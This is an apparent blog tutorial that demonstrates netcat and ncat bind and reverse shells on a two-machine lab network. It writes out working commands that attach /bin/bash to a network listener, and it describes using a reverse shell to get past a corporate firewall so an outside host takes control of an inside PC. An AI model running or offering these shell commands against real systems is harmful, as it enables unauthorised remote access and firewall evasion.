HOWTO Using Bind Shell and Reverse Shell
Now let’s review on how to use Bind Shell and Reverse Shell. You need to have two workstation for this exercise, the 1st PC (InsiderPC with IP 192.168.10.100) is in your network and the 2nd PC (OutsiderPC with IP 192.168.10.200) from the outside network.
Using Bind Shell, start this command from your OutsiderPC (Bob workstation).
nc -nvlp 5555 -e /bin/bash ;starting netcat with listening port 5555, of course you can use other port number and allowing the client (InsiderPC) to connect and execute bash shell command prompt. This is to prepare Bob’s workstation to listen using port 5555 so Alice can connect.
From the InsiderPC (Alice workstation), connect using the following command
nc -nv 192.168.10.200 5555 [Enter] the IP address is assigned to the OutsiderPC.
When you type “ifconfig” you will see the IP address of OutsiderPC. You are executing this command from the OutsiderPC.
This is to allow Alice to connect to Bob’s workstation to take control for administration purposes.
Now Reserve Shell. The difference is the client (InsiderPC) will provide the executable
file. Let’s begin by preparing our OutsiderPC to listen. In OutsiderPC, type the following command.
nc -nvlp 5555
From the InsiderPC, connect using the following command.
nc -nv 192.168.10.200 5555 -e /bin/bash [Enter] the IP address is assigned to the OutsiderPC (Bob’s workstation).
Alice is located in the corporate network with Firewall, she will not be able to accept connection coming from outside (Bob) though Alice can make outbound connection which allow her to connect to Bob’s workstation with the NETCAT connection tied to a local shell. Once this connection is made, Bob then will have access to Alice computer an her behalf. Similar to a remote access tool.
Using the OutsiderPC, type “ifconfig” you will see the InsiderPC ip address because you are using the InsiderPC (Alice) to execute the command.
Related: Learn Penetration Testing using Kali
Please note, using netcat is not encrypted. All transactions are in plain text. The NCAT tool will provide the encryption not available in netcat command. It’s a similar process when you use bind shell or reverse shell.
UPDATED: Here’s the command using NCAT encrypted session for bind shell.
# ncat -lvp 5555 -e /bin/bash –allow 192.168.2.100 –ssl
where as -lvp listening to port 5555, -e /bin/bash (or -e cmd.exe for windows) bind shell, to –allow remote IP address to connect and using –ssl to encrypt the session.
To connect from remote PC with an IP address of 192.168.2.100, use the following command.
# ncat -v 192.168.2.200 5555 –ssl
where as to connect to 192.168.2.200 remote PC that give us permission using port 5555 and –ssl for encrypted session.
And for the reverse bind shell, use these commands.
PC1 # ncat -lvp 5555 –allow 192.168.2.100 –ssl
PC2 # ncat -v 192.168.2.200 5555 -e /bin/bash –ssl
You can use Wireshark or other snipping network traffic tool to check if your session is encrypted.
Always encrypt. Always secure.